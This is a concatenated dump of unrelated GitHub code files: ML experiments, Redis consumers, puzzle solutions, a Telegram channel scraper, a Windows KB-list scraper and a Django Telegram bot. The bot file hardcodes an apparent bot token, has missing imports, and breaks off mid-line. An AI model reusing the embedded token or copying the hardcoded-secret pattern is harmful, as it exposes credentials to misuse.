current_speed\"\"\", [\n ('Red', 200, 50, 20, 180, 30), ('Blue', 150, 25, 25, 100, 0),\n ('Black', 250, 20, 30, 100, 0)])\ndef test_apply_breaks_when_truck_object_current_speed_is_more_than_or_equal_to_truck_object_tyre_friction_returns_current_speed(color, max_speed, acceleration, tyre_friction, max_cargo_weight, current_speed):\n # Arrange\n truck = Truck(color=color, max_speed=max_speed, acceleration=acceleration,\n tyre_friction=tyre_friction,\n max_cargo_weight=max_cargo_weight)\n truck.start_engine()\n truck.accelerate()\n\n # Act\n truck.apply_brakes()\n\n # Assert\n assert truck.current_speed == current_speed\n\ndef test_apply_breaks_when_truck_object_current_speed_is_less_than_truck_object_tyre_friction_returns_zero():\n # Arrange\n truck = Truck(color='Red', max_speed=200, acceleration=40,\n tyre_friction=15, max_cargo_weight=80)\n truck.start_engine()\n truck.accelerate()\n current_speed_when_less_than_tyre_friction = 0\n\n # Act\n truck.apply_brakes()\n truck.apply_brakes()\n truck.apply_brakes()\n\n # Assert\n assert truck.current_speed == current_speed_when_less_than_tyre_friction\n\ndef test_apply_breaks_when_truck_object_current_speed_is_equal_to_truck_object_tyre_friction_returns_current_speed():\n # Arrange\n truck = Truck(color='Red', max_speed=200, acceleration=40,\n tyre_friction=10, max_cargo_weight=90)\n truck.start_engine()\n truck.accelerate()\n current_speed = 10\n\n # Act\n truck.apply_brakes()\n truck.apply_brakes()\n truck.apply_brakes()\n\n # Assert\n assert truck.current_speed == current_speed\n","repo_name":"GVK289/aws_folders","sub_path":"clean_code/clean_code_submissions/clean_code_assignment_002/tests/test_truck_apply_breaks.py","file_name":"test_truck_apply_breaks.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30391426629","text":"import sklearn as sk\nimport numpy as np\nimport h5py\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV\nimport xgboost as xgb\nfrom xgboost.sklearn import XGBClassifier\nfrom sklearn.metrics import classification_report, accuracy_score\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.linear_model import LogisticRegression\nimport os\nimport sys\n\nsys.path.insert(1, os.path.join(sys.path[0], '../utils'))\nfrom utilities import calculate_accuracy\nimport numpy as np\n\n\ndef prepare_data(datatype):\n workspace = \"/home/ccyoung/Downloads/dcase2018_task1-master\"\n truncation_dir = os.path.join(workspace, 'features', 'truncation',\n 'holdout_fold={}'.format(1))\n if datatype == 'train':\n hf = h5py.File(os.path.join(truncation_dir, 'train_hpss_6800.h5'), 'r')\n features = hf['feature'][:]\n targets = hf['target'][:]\n return features, np.argmax(targets, axis=-1)\n elif datatype == 'validate':\n hf = h5py.File(os.path.join(truncation_dir, 'validate_hpss_6800.h5'), 'r')\n features = hf['feature'][:]\n targets = hf['target'][:]\n return features, np.argmax(targets, axis=-1)\n\n\ndef stack_one_stage():\n ## 1, 准备数据\n '''创建训练的数据集'''\n X, y = prepare_data('train')\n X_predict, y_predict = prepare_data('validate')\n print(y_predict.shape)\n # y = np.argmax(y, axis=-1)\n # y_predict = np.argmax(y_predict, axis=-1)\n\n ## 2.定义K个第一阶段的模型\n '''模型融合中使用到的各个单模型'''\n clfs = [\n RandomForestClassifier(n_estimators=390, random_state=10, n_jobs=4,\n max_features=1, min_samples_leaf=1, max_depth=13, ),\n SVC(C=0.6, gamma=1e-4, random_state=10)]\n ## 3. 保存第一阶段模型所有输出 shape=(预测的样本数,多个模型的预测)作为第二阶段的特征输入\n dataset_blend_train = np.zeros((X.shape[0], len(clfs)))\n dataset_blend_test = np.zeros((X_predict.shape[0], len(clfs)))\n print(dataset_blend_train.shape)\n print(dataset_blend_test.shape)\n # 4. 第一阶段训练:对每个模型分别做交叉验证训练,并汇总所有预测结果作为新的特征\n '''5折stacking'''\n n_folds = 5\n skf = StratifiedKFold(n_folds)\n for j, clf in enumerate(clfs):\n\n dataset_blend_test_j = np.zeros((X_predict.shape[0], n_folds)) # 汇总交叉验证的结果\n\n ##交叉验证训练\n for i, (train, test) in enumerate(skf.split(X, y)): # 遍历每一折数据 train,test均为索引\n '''使用第i个部分作为预测,剩余的部分来训练模型,获得其预测的输出作为第i部分的新特征。'''\n print(\"Fold\", i)\n X_train, y_train, X_test, y_test = X[train], y[train], X[test], y[test]\n clf.fit(X_train, y_train)\n y_submission = clf.predict(X_test)\n dataset_blend_train[test, j] = y_submission # 保存每个模型K折预测结果\n dataset_blend_test_j[:, i] = clf.predict(X_predict)\n '''对于测试集,直接用这k个模型的预测值均值作为新的特征。'''\n dataset_blend_test[:, j] = dataset_blend_test_j.mean(1) # 平均每一折结果\n # print(\"auc Score: %f\" % calculate_accuracy(np.argmax(y_predict, axis=-1), dataset_blend_test[:, j], classes_num=10,\n # average='macro'))\n\n ##5. 第二阶段的训练 使用新的模型训练 得到第一阶段生成的新训练集再次训练,并使用新测试集再次预测\n np.save('data.npz', dataset_blend_train)\n np.save('label.npz', dataset_blend_test)\n\n\ndef stack_two_stage():\n X, y = prepare_data('train')\n X_predict, y_predict = prepare_data('validate')\n dataset_blend_train = np.load('data.npz.npy')\n dataset_blend_test = np.load('label.npz.npy')\n\n clf = GradientBoostingClassifier(learning_rate=0.005,subsample=0.8,random_state=10,n_estimators=600)\n clf.fit(dataset_blend_train, y)\n y_submission = clf.predict(dataset_blend_test)\n\n # print(\"Linear stretch of predictions to [0,1]\")\n # y_submission = (y_submission - y_submission.min()) / (y_submission.max() - y_submission.min())\n print(\"blend result\")\n print(\"auc Score: %f\" % (\n calculate_accuracy(y_predict, y_submission, classes_num=10, average='macro')))\n\n\nif __name__ == '__main__':\n stack_two_stage()\n","repo_name":"rongxuanhong/task1","sub_path":"keras/classifier_fusion.py","file_name":"classifier_fusion.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3538568884","text":"# -*- coding: utf-8 -*-\r\nimport tensorflow as tf\r\nimport os\r\n\r\n# 生成整数型的属性\r\ndef _int64_feature(value):\r\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\r\n\r\nnum_shards = 2\r\ninstance_per_shard = 10\r\n\r\nfor i in range(num_shards):\r\n filename = 'model/data.tfrecord-%.5d-of%.5d' %(i,num_shards)\r\n writer = tf.python_io.TFRecordWriter(filename)\r\n for j in range(instance_per_shard):\r\n example = tf.train.Example(features=tf.train.Features(feature={\r\n 'i':_int64_feature(i),\r\n 'j':_int64_feature(j)\r\n }))\r\n writer.write(example.SerializeToString())\r\n writer.close()\r\n\r\n\r\ntf_record_pattern = os.path.join( 'model/', 'data.tfrecord-*' )\r\ndata_files = tf.gfile.Glob( tf_record_pattern )\r\nfilename_quene = tf.train.string_input_producer(data_files,shuffle=False)\r\n\r\nreader = tf.TFRecordReader()\r\n_, serialized_example = reader.read(filename_quene)\r\n\r\nfeatures = tf.parse_single_example(serialized_example,features={\r\n 'i': tf.FixedLenFeature([],tf.int64),\r\n 'j': tf.FixedLenFeature( [], tf.int64),\r\n})\r\n\r\nwith tf.Session() as sess:\r\n tf.global_variables_initializer().run()\r\n coord = tf.train.Coordinator()\r\n threads = tf.train.start_queue_runners(sess = sess, coord = coord)\r\n for i in range(15):\r\n print(sess.run([features['i'],features['j']]))\r\n\r\n coord.request_stop()\r\n coord.join(threads)","repo_name":"WanJunCode/tensorflow","sub_path":"第七章/new/写入数据.py","file_name":"写入数据.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26950120387","text":"import numpy as np\nimport PIL.Image\nfrom matplotlib import pyplot as plt\n\ndef gaussian_mix():\n K = 3\n \n my = 0.5 * np.ones((288, 384, K, 3))\n #my = my / np.linalg.norm(my)\n\n sigma_squared = 0.05 * np.ones((288, 384, K, 3))\n #sigma_squared = sigma_squared / np.linalg.norm(sigma_squared[0, 0, :, :])\n sigma_init_squared = np.array((0.05, 0.05, 0.05))\n \n w = np.ones((288, 384, K))\n w = w / K\n w_init = 1.0/K\n \n lamb = 3.0\n T = 0.8\n alpha = 1.0/600.0\n\n B_hat = np.zeros((288, 384))\n B = np.zeros((288, 384))\n \n for f in range(20, 50):\n print(f)\n file_name = '../../frames2/Walk1{:03d}.jpg'.format(f)\n frame = np.asarray(PIL.Image.open(file_name))\n frame = frame / 255.0\n \n c = np.zeros(K)\n p = np.zeros((288, 384, K))\n\n for x in range(frame.shape[0]):\n for y in range(frame.shape[1]):\n match = False\n for k in range(K):\n dk_squared = np.sum(np.power(frame[x, y, :] - my[x, y, k, :], 2) / sigma_squared[x, y, k, :])\n\n if np.sqrt(dk_squared) < lamb: \n if not match:\n m = k\n elif w[x, y, k]/np.sqrt(np.linalg.norm(sigma_squared[x, y, k])) > (w[x, y, m]/np.sqrt(np.linalg.norm(sigma_squared[x, y, m]))):\n m = k\n \n match = True\n \n if not match:\n m = K - 1\n w[x, y, m] = w_init\n my[x, y, m] = frame[x,y]\n sigma_squared[x, y, m] = sigma_init_squared\n else:\n w[x, y, m] = (1 - alpha)*w[x, y, m] + alpha\n p[x, y, m] = alpha / w[x, y, m]\n my[x, y, m] = (1-p[x, y, m])*my[x, y, m] + p[x, y, m]*frame[x,y]\n sigma_squared[x, y, m] = (1-p[x, y, m])*sigma_squared[x, y, m] + np.multiply((p[x, y, m]*(frame[x,y]-my[x, y, m])), (frame[x,y] - my[x, y, m]))\n\n w[x, y, :] = w[x, y, :] / np.sum(w[x, y, :])\n\n for k in range(K):\n c[k] = w[x, y, k]/np.sqrt(np.linalg.norm(sigma_squared[x, y, k]))\n\n if match:\n #print(c)\n indices = np.argsort(-c)\n #print(indices)\n w[x, y] = w[x, y, indices]\n my[x, y] = my[x, y, indices]\n sigma_squared[x, y] = sigma_squared[x, y, indices]\n \n i = 0\n\n for i in range(K):\n if np.sum(w[x, y, 0:i]) > T:\n #print(\"BREAK\")\n break\n \n B[x, y] = i #???\n #print(i)\n\n for x in range(frame.shape[0]):\n for y in range(frame.shape[1]):\n B_hat[x, y] = 0\n for k in range(int(B[x, y])):\n dk_squared = np.sum(np.power(frame[x, y, :] - my[x, y, k, :], 2) / sigma_squared[x, y, k, :])\n \n if np.sqrt(dk_squared) < lamb:\n B_hat[x,y] = 1\n plt.figure(f)\n plt.imshow(B_hat, cmap=\"gray\")\n\n plt.show()\n\n return B_hat\n\ngaussian_mix()","repo_name":"johanforslund/background-modelling","sub_path":"bg_modelling/gmm/gaussian_mix.py","file_name":"gaussian_mix.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72416692853","text":"\"\"\"\nThis script is responsible for processing payment and inventory related messages from Redis streams.\n\"\"\"\n\nfrom inventory.main import redis\nimport time\n\n\n# Payment consumer setup\npayment_key = 'refund_order'\npayment_group = 'payment-group'\npayment_consumer = 'payment-consumer'\n\n# Inventory consumer setup\ninventory_key = 'order_completed'\ninventory_group = 'inventory-group'\ninventory_consumer = 'inventory-consumer'\n\n\ndef create_group(stream_key, group_name):\n \"\"\"\n Create a consumer group for a given stream.\n\n Args:\n stream_key (str): The Redis stream key.\n group_name (str): The name of the consumer group.\n\n Returns:\n None\n \"\"\"\n try:\n redis.xgroup_create(stream_key, group_name, mkstream=True)\n except Exception as e:\n if \"BUSYGROUP\" not in str(e):\n print(f\"Error creating group: {str(e)}\")\n else:\n print('Group already exists!')\n\n\ncreate_group(payment_key, payment_group)\ncreate_group(inventory_key, inventory_group)\n\n\ndef read_stream(group, consumer, key):\n \"\"\"\n Read messages from a Redis stream.\n\n Args:\n group (str): The name of the consumer group.\n consumer (str): The name of the consumer.\n key (str): The Redis stream key.\n\n Returns:\n list: A list of tuples, where each tuple represents a message.\n \"\"\"\n while True:\n try:\n return redis.xreadgroup(group, consumer, streams={key: '>'}, count=1)\n except Exception as e:\n print(f\"Error reading stream: {str(e)}\")\n time.sleep(1)\n\n\ndef process_payment(results):\n \"\"\"\n Process payment messages from the Redis stream.\n\n Args:\n results (list): A list of tuples, where each tuple represents a message.\n\n Returns:\n None\n \"\"\"\n if not results:\n return\n\n for result in results:\n obj = result[1][0][1]\n try:\n order_pk = obj['pk']\n order_key = f':payment.main.Order:{order_pk}'\n order_data = redis.hgetall(order_key)\n if order_data:\n redis.hmset(order_key, {\"status\": str(\"refunded\").encode()})\n print(f\"Refunded order: {obj['pk']}\")\n redis.xack(payment_key, payment_group, result[1][0][0])\n except Exception as e:\n print(f\"Error refunding order: {str(e)}\")\n\n\ndef process_inventory(results):\n \"\"\"\n Process inventory messages from the Redis stream.\n\n Args:\n results (list): A list of tuples, where each tuple represents a message.\n\n Returns:\n None\n \"\"\"\n if not results:\n return\n\n for result in results:\n obj = result[1][0][1]\n product_id = obj['product_id']\n product_key = f':inventory.main.Product:{product_id}'\n product_data = redis.hgetall(product_key)\n if product_data:\n quantity = int(obj['quantity'])\n product_quantity = int(product_data['quantity'])\n if product_quantity >= quantity:\n redis.hmset(product_key, {'quantity': str(product_quantity - quantity).encode()})\n print(f\"Updated product: {product_id}\")\n redis.xack(inventory_key, inventory_group, result[1][0][0])\n else:\n print(f\"Insufficient inventory for product: {product_id}\")\n redis.xadd('refund_order', obj, '*')\n else:\n print(f\"Product not found with ID: {product_id}\")\n redis.xadd('refund_order', obj, '*')\n\n\nwhile True:\n payment_results = read_stream(payment_group, payment_consumer, payment_key)\n process_payment(payment_results)\n\n inventory_results = read_stream(inventory_group, inventory_consumer, inventory_key)\n process_inventory(inventory_results)\n\n time.sleep(1)\n\n\n# This script has two main functions: `process_payment` and `process_inventory` that process payment\n# and inventory related messages from Redis streams respectively. The `create_group` function is used\n# to create a consumer group for a given stream. The `read_stream` function is used to read messages\n# from a Redis stream.\n#\n# The script has the following variables:\n# - `payment_key`: the key of the Redis stream where payment messages are sent.\n# - `payment_group`: the name of the consumer group for payment messages.\n# - `payment_consumer`: the name of the payment consumer.\n# - `inventory_key`: the key of the Redis stream where inventory messages are sent.\n# - `inventory_group`: the name of the consumer group for inventory messages.\n# - `inventory_consumer`: the name of the inventory consumer.\n#\n# The `process_payment` function processes payment messages from the Redis stream. It loops through each message in\n# the `results` list and refunds the corresponding order by setting its status to \"refunded\" in Redis. It then\n# acknowledges the message by calling `redis.xack`.\n#\n# The `process_inventory` function processes inventory messages from the Redis stream. It loops through each message\n# in the `results` list and updates the corresponding product's quantity in Redis if there is sufficient inventory.\n# If there is not enough inventory, it adds the message to the `refund_order` stream by calling `redis.xadd`.\n#\n# The `read_stream` function continuously reads messages from a Redis stream. It returns a list of tuples,\n# where each tuple represents a message. The `while` loop at the end of the script continuously reads payment and\n# inventory messages from their respective streams using the `read_stream` function, and processes them using the\n# `process_payment` and `process_inventory` functions, respectively. It then sleeps for 1 second before starting\n# the loop again.\n","repo_name":"MaksimKisliak/FastAPI-services","sub_path":"consumer_managers.py","file_name":"consumer_managers.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42497268597","text":"# Sébastien Touzé\n# Script for Advent Of Code 2021\n# DAY 07\n\ndef load_file(filename):\n file = open(filename)\n\n positions = file.readline().split(',')\n positions = list(map(int, positions))\n\n pos_min = min(positions)\n pos_max = max(positions)\n\n return positions, pos_min, pos_max\n\n\ndef do_part1(filename):\n positions, pos_min, pos_max = load_file(filename)\n\n # this variable will store the end values : optimum position, fuel used. Initialized with fuel big enough so that\n # first run with pos_min must be better\n optimum = [pos_min, sum(positions)]\n for optimum_candidate in range(pos_min, pos_max + 1):\n dist_total = 0\n for i in range(len(positions)):\n dist_total += abs(positions[i] - optimum_candidate)\n if dist_total < optimum[1]:\n optimum = [optimum_candidate, dist_total]\n\n print(optimum)\n\n\ndef do_part2(filename):\n positions, pos_min, pos_max = load_file(filename)\n\n optimum = [pos_min, pow(sum(positions) + 1, 2)]\n for optimum_candidate in range(pos_min, pos_max + 1):\n dist_total = 0\n for i in range(len(positions)):\n dist = abs(positions[i] - optimum_candidate)\n dist_total += dist * (1 + dist) / 2 # Arithmetic sum\n if dist_total < optimum[1]:\n optimum = [optimum_candidate, dist_total]\n\n print(optimum)\n\n\nprint(\"### Part 1 ###\")\ndo_part1('data/day7input')\n\nprint(\"### Part 2 ###\")\ndo_part2('data/day7example')\ndo_part2('data/day7input')\n\n\n","repo_name":"SebastienTouze/advent_of_code_2021","sub_path":"day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43529112331","text":"from sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom Utilities.LargeDataProcessing.Sampling import sample_patches\nfrom eolearn.core import FeatureType\nimport lightgbm as lgb\nfrom sklearn.metrics import accuracy_score, f1_score, confusion_matrix, plot_confusion_matrix\nfrom sklearn.linear_model import LogisticRegression\nimport time\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport scipy.cluster.hierarchy as sch\nfrom sklearn import tree\nfrom streamdm import HoeffdingTree, HoeffdingAdaptiveTree, NaiveBayes, LogisticRegression, MajorityClass, Perceptron, \\\n Bagging\nfrom .classification_comparison import get_data, fit_predict, class_names\n\nmethods = [\n #{\n # 'name': 'Decision Tree (scikit-learn)',\n # 'ctor': DecisionTreeClassifier,\n # 'params': {}\n #},\n {\n 'name': 'Hoeffding Tree (streamDM)',\n 'ctor': HoeffdingTree,\n 'params': {\n 'max_byte_size': 33554432,\n 'memory_estimate_period': 1000000,\n 'grace_period': 200,\n 'split_confidence': 0.0000001,\n 'tie_threshold': 0.05,\n 'binary_splits': False,\n 'stop_mem_management': False,\n 'remove_poor_atts': False,\n 'leaf_learner': 'NB',\n 'bb_threshold': 0,\n 'tree_property_index_list': \"\",\n 'no_pre_prune': False\n }\n },\n {\n 'name': 'Hoeffding Adaptive Tree (streamDM)',\n 'ctor': HoeffdingAdaptiveTree,\n 'params': {\n 'max_byte_size': 33554432,\n 'memory_estimate_period': 1000000,\n 'grace_period': 200,\n 'split_confidence': 0.0000001,\n 'tie_threshold': 0.05,\n 'binary_splits': False,\n 'stop_mem_management': False,\n 'remove_poor_atts': False,\n 'leaf_learner': 'NB',\n 'bb_threshold': 0,\n 'tree_property_index_list': \"\",\n 'no_pre_prune': False\n }\n },\n {\n 'name': 'Bagging (streamDM)',\n 'ctor': Bagging,\n 'params': {\n 'ensemble_size': 10,\n 'learner': {\n 'name': 'HoeffdingTree',\n 'max_byte_size': 33554432,\n 'memory_estimate_period': 1000000,\n 'grace_period': 200,\n 'split_confidence': 0.0000001,\n 'tie_threshold': 0.05,\n 'binary_splits': False,\n 'stop_mem_management': False,\n 'remove_poor_atts': False,\n 'leaf_learner': 'NB',\n 'bb_threshold': 0,\n 'tree_property_index_list': \"\",\n 'no_pre_prune': False\n }\n }\n },\n {\n 'name': 'Naive Bayes (streamDM)',\n 'ctor': NaiveBayes,\n 'params': {}\n },\n {\n 'name': 'Logistic Regression (streamDM)',\n 'ctor': LogisticRegression,\n 'params': {\n 'learning_ratio': 0.01,\n 'lambda': 0.0001\n }\n },\n {\n 'name': 'Perceptron (streamDM)',\n 'ctor': Perceptron,\n 'params': {\n 'learning_ratio': 1.0\n }\n },\n {\n 'name': 'Majority Class (streamDM)',\n 'ctor': MajorityClass,\n 'params': {}\n }\n]\n\nif __name__ == '__main__':\n\n # x, y = get_data('../Utilities/LargeDataProcessing/Samples/enriched_samples9797.csv')\n x, y = get_data('/home/beno/Documents/IJS/Perceptive-Sentinel/enriched_samples10000.csv')\n\n for method in methods:\n learner = method['ctor']()\n learner.set_params(**method['params'])\n fit_predict(x, y, learner, class_names, method['name'])\n","repo_name":"E3-JSI-archive/PerceptiveSentinel","sub_path":"Classification/stream_comparison.py","file_name":"stream_comparison.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32004194694","text":"from telethon.tl.types import MessageEntityTextUrl\nfrom glob import glob\nfrom dateutil.relativedelta import relativedelta # pip3 install python-dateutil\n\nimport datetime\nimport os\n\n\ndef get_channel_id(client, link): # получение ID канала\n m = client.get_messages(link, limit=1)\n channel_id = m[0].peer_id.channel_id\n return str(channel_id)\n\n\ndef clearify_text(msg): # очищение текста от символов гиперссылки\n text = msg.message\n text_splitted = text.split()\n text_listed = [word for word in text_splitted if word != ' ']\n return \" \".join(text_listed)\n\n\ndef get_message_content(client, msg, url, channel_name, directory_name): # получение содержимого сообщения\n msg_date = str(msg.date) # дата отправки сообщения\n msg_url = url + '/' + str(msg.id) # каст ссылки на сообщение\n file = open(f\"{channel_name}/{directory_name}/{directory_name}_meta.txt\", 'a+') # запись метаданных сообщения\n file.write(msg_url)\n file.write('\\n' + msg_date)\n file.close()\n if msg.message: # если сообщение содержит текст, запись этого текста в текстовый файл в папке сообщения\n text = clearify_text(msg=msg)\n file = open(f\"{channel_name}/{directory_name}/{directory_name}.txt\", \"w\")\n file.write(text)\n file.close()\n if msg.media: # если сообщение содержит медиа (фото, видео, документы, файлы), загрузка медиа в папку сообщения\n client.download_media(message=msg, file=f\"{channel_name}/{directory_name}\")\n if msg.entities: # запись гиперссылок из текста сообщения в файл сообщения\n urls = [ent.url for ent in msg.entities if isinstance(ent, MessageEntityTextUrl)]\n file = open(f\"{channel_name}/{directory_name}/{directory_name}.txt\", mode='a+')\n for u in urls:\n file.write('\\n' + u)\n file.close()\n\n\ndef find_last_parsed_date(path): # определение даты, с которой начинать парсинг\n paths = glob(f\"{path}/*/*meta.txt\", recursive=True) # поиск существующих метаданных по уже собранным сообщениям\n oldest = datetime.datetime.strptime(\"1970-01-01 00:00:00+00:00\", \"%Y-%m-%d %H:%M:%S%z\")\n temp = oldest\n for p in paths: # поиск даты отправки последнего сообщения\n with open(p, 'r') as file:\n date = datetime.datetime.strptime(file.readlines()[-1], \"%Y-%m-%d %H:%M:%S%z\")\n if date > oldest:\n oldest = date\n if temp == oldest:\n oldest = datetime.datetime.now() - relativedelta(months=3) # если сообщений нет, офсет устанавливается на\n # три месяца от текущей даты\n return oldest\n\n\ndef parse(client, url): # сбор сообщений из канала\n err = [] # переменная возможной ошибки\n channel_id = get_channel_id(client, url) # получение ID канала\n os.makedirs(channel_id, exist_ok=True) # создание папки канала в текущей директории\n oldest = find_last_parsed_date(channel_id) # получение даты, с которой начинать парсинг\n for message in client.iter_messages(url, reverse=True, offset_date=oldest): # итератор по сообщениям (урл - ссылка\n # на канал, реверс - итерация от старых\n # к новым, офсет - дата с которой\n # начинать парсинг\n try:\n directory_name = str(message.id) # получение ID сообщения\n os.makedirs(f\"{channel_id}/{directory_name}\", exist_ok=True) # создание папки сообщения\n get_message_content(client, message, url, channel_id, directory_name) # обработка сообщения\n\n except Exception as passing: # обработка ошибок\n err.append(passing)\n continue\n return err # возврат возможных ошибок\n","repo_name":"mmat16/telegram_channel_parser","sub_path":"parser_functions.py","file_name":"parser_functions.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"ru","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"9981011369","text":"#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport requests\nimport sys\nfrom datetime import datetime\n\nSUPPORTED_BUILDS = {\n 6002: 'https://support.microsoft.com/en-us/help/4343218', # 2008 SP2\n 7601: 'https://support.microsoft.com/en-us/help/4009469', # 7 / 2008R2 SP1\n 9200: 'https://support.microsoft.com/en-us/help/4009471', # 2012\n 9600: 'https://support.microsoft.com/en-us/help/4009470', # 8.1 / 2012R2\n 10240: 'https://support.microsoft.com/en-us/help/4000823', # Windows 10 1507 \"RTM\" \"Threshold 1\"\n 10586: 'https://support.microsoft.com/en-us/help/4000824', # Windows 10 1511 \"November Update\" \"Threshold 2\"\n 14393: 'https://support.microsoft.com/en-us/help/4000825', # Windows 10 1607 \"Anniversary Update\" \"Redstone 1\" / Server 2016\n 15063: 'https://support.microsoft.com/en-us/help/4018124', # Windows 10 1703 \"Creators Update\" \"Redstone 2\"\n 16299: 'https://support.microsoft.com/en-us/help/4043454', # Windows 10 1709 \"Fall Creators Update\" \"Redstone 3\"\n 17134: 'https://support.microsoft.com/en-us/help/4099479', # Windows 10 1803 \"Redstone 4\"\n 17763: 'https://support.microsoft.com/en-us/help/4464619', # Windows 10 1809 \"Redstone 5\" / Server 2019\n}\nBEGIN_MARKER = '\"minorVersions\":'\nEND_MARKER = ']\\n'\nDATE_FORMAT = '%Y-%m-%dT%H:%M:%S'\n\n# Updates types and whether they are cumulative or not\nUPDATE_TYPES = {\n '': False, # legacy discontinued non-cumulative updates\n 'security-only update': False,\n 'monthly rollup': True,\n 'os build monthly rollup': True,\n 'preview of monthly rollup': True,\n}\n\ndef fetch_security_updates(url):\n html = requests.get(url).text\n html = html.replace('\\r\\n', '\\n')\n json_begin = html.find(BEGIN_MARKER)\n if json_begin == -1:\n sys.stderr.write('Unable to find marker {} in {}\\n'.format(\n BEGIN_MARKER, url))\n sys.exit(1)\n json_begin += len(BEGIN_MARKER)\n json_end = html.find(END_MARKER, json_begin)\n if json_end == -1:\n sys.stderr.write('Unable to find marker {} in {}\\n'.format(\n END_MARKER, url))\n sys.exit(1)\n json_end += len(END_MARKER)\n updates_json = html[json_begin:json_end]\n updates_json = json.loads(updates_json)\n updates = []\n for update in updates_json:\n if not set(('releaseVersion','id','releaseDate')).issubset(set(update.keys())):\n sys.stderr.write('Can\\'t handle updates without id/releaseVersion/releaseDate\\n')\n sys.exit(1)\n update_type = update['releaseVersion'].lower().strip()\n if 'os build' in update_type: # new >= 10.0 updates type name format, they are all cumulative\n update_type = 'monthly rollup'\n if update_type not in UPDATE_TYPES:\n sys.stderr.write('Update with unknown releaseVersion \"{}\"\\n'.format(\n update['releaseVersion']))\n sys.stderr.write('\\n' + str(update) + '\\n')\n sys.exit(1)\n is_cumulative = UPDATE_TYPES[update_type]\n date = datetime.strptime(update['releaseDate'], DATE_FORMAT).date()\n updates.append((date, is_cumulative, update['id']))\n updates.sort(key=lambda x: x[0])\n return updates\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--csv', type=argparse.FileType('w'), default=None)\n parser.add_argument('--sql', type=argparse.FileType('w'), default=None)\n args = parser.parse_args()\n if args.sql is None and args.csv is None:\n args.csv = sys.stdout\n if args.csv is not None:\n args.csv.write('build_number\\tis_cumulative\\tpublish_date\\tkb_id\\n')\n for build, url in SUPPORTED_BUILDS.items():\n updates = fetch_security_updates(url)\n for (date, is_cumulative, kb) in updates:\n args.csv.write('{}\\t{}\\t{}/{}/{}\\t{}\\n'.format(build,\n (\"1\" if is_cumulative else \"0\"),\n date.year, date.month, date.day, kb))\n if args.sql is not None:\n args.sql.write('\\n')\n args.sql.write('''CREATE TABLE [kb_list](\n [build] [int] NOT NULL,\n [cumulative] [bit] NOT NULL,\n\t [id] [varchar](255) NOT NULL,\n\t [date] [date] NOT NULL)\\n''')\n args.sql.write('INSERT INTO [kb_list] VALUES ')\n sql = []\n for build, url in SUPPORTED_BUILDS.items():\n updates = fetch_security_updates(url)\n for (date, is_cumulative, kb) in updates:\n sql.append(\"({},{},'KB{}','{}-{}-{}')\".format(\n build, (1 if is_cumulative else 0), kb,\n date.year, date.month, date.day))\n args.sql.write(',\\n '.join(sql) + ';')\n\n","repo_name":"mtth-bfft/kblist","sub_path":"kblist.py","file_name":"kblist.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"71958617334","text":"from django.shortcuts import render, get_object_or_404, reverse\nfrom django.template.loader import render_to_string\nfrom django.http import HttpResponse, Http404, HttpResponseForbidden, HttpResponseBadRequest, JsonResponse\nfrom .parser import parse_intercept_rss\nfrom django.views.generic import View\n\nimport telepot\n\nTOKEN = '605347574:AAFLA9YzWE7JnPxK31uCOESsv7X9OSoacrI'\t# temporary token key for my bot\n\nAlekiBot = telepot.Bot(TOKEN)\n\ndef display_help():\n\treturn render_to_string('help.md')\n\ndef display_intercept_feed():\n\treturn render_to_string('feed.md', {'items': parse_intercept_rss()})\n\nclass CommandReceiveView(View):\n\t\"\"\"receives post request and handles it appropriately accng to command\"\"\"\n\tdef post(self, request, bot_token):\n\t\tif bot_token != TOKEN:\n\t\t\treturn HttpResponseForbidden('Invalid token')\n\n\t\tcommands = {\n\t\t\t'start/': display_help,\n\t\t\t'help': display_help,\n\t\t\t'feed': display_intercept_feed,\n\t\t}\n\n\t\ttry:\n\t\t\tpayload = json.loads(request.body.decode('utf-8'))\n\t\texcept ValueError:\n\t\t\tHttpResponseBadRequest('invalid request body')\n\t\telse:\n\t\t\tchat_id = payload['message']['chat']['id']\n\t\t\tcmd = payload['message'].get('text')\n\t\t\tfunc = commands.get(cmd.split()[0].lower())\n\t\t\tif func:\n\t\t\t\tAlekiBot.sendMessage(chat_id, func(), parse_mode='Markdown')\n\t\t\telse:\n\t\t\t\tAlekiBot.sendMessage(chat_id, 'I do not understand you sir')\n\n\t\treturn JsonResponse({}, status=200)\n\n\n@method_decorator(csrf_exempt)\ndef dispatch(self, request, *args, **kwargs):\n\treturn super(CommandReceiveView, self).dispatch(request, *args, 